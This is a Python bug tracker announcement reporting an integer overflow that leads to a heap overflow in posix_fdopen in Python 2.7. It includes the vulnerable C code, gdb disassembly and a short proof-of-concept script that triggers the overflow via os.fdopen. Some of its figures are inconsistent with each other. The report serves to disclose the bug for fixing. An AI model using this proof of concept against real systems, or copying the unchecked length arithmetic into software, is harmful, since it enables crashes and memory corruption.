[New-bugs-announce] [issue27235] Heap overflow occurred due to the int overflow

[Rustemzade Mehemmed]

New submission from Rustemzade Mehemmed:

I have tested this vulnerability on the Python 2.7 and it absolutely affected :). Integer overflow produce in posix_fdopen function. If an attacker sent fdopen mode value larger than max integer value (2*32) to fdopen after integer overflow occurred. 

    int fd;
    char *orgmode = "r";
    int bufsize = -1;
    FILE *fp;
    PyObject *f;
    char *mode;
    if (!PyArg_ParseTuple(args, "i|si", &fd, &orgmode, &bufsize))
        return NULL;

    /* Sanitize mode.  See fileobject.c */
    mode = PyMem_MALLOC(strlen(orgmode)+3);
    ...
    strcpy(mode, orgmode);

 os.fdopen(fd[, mode[, bufsize]])

fo = os.fdopen(fd, "r"*0xffffffff)

   0x5e2595 <+86>:	mov    edi,eax
=> 0x5e2598 <+89>:	call   0x416e50 <strlen at plt>     
(gdb) print /x $eax
$1 = 0xffffffff
after does addition of "add" instruction therefore overflow occured and => 0x5e259d <+94>:	add    eax,0x3
(gdb) print /x $eax
$5 = 0x2
and memory allocate after buffer copy== > 
   0x5e25a1 <+98>:	mov    edi,eax
   0x5e25a4 <+101>:	call   0x48f793 <_PyMem_DebugMalloc>
   0x5e25cb <+140>:	mov    esi,edx
   ...
   0x5e25ce <+143>:	mov    edi,eax
   0x5e25d1 <+146>:	call   0x416b80 <strcpy at plt>

copy buffer
strcpy(mode, orgmode); <=== overflow


poc:
#!/usr/bin/python

import os, sys

fd = os.open( "foo.txt", os.O_RDWR|os.O_CREAT )
fo = os.fdopen(fd, "r"*0xffffff)
print "Closed the file successfully!!"

----------
messages: 267447
nosy: madness
priority: normal
severity: normal
status: open
title: Heap overflow occurred due to the int overflow

_______________________________________
Python tracker <report at bugs.python.org>
<http://bugs.python.org/issue27235>
_______________________________________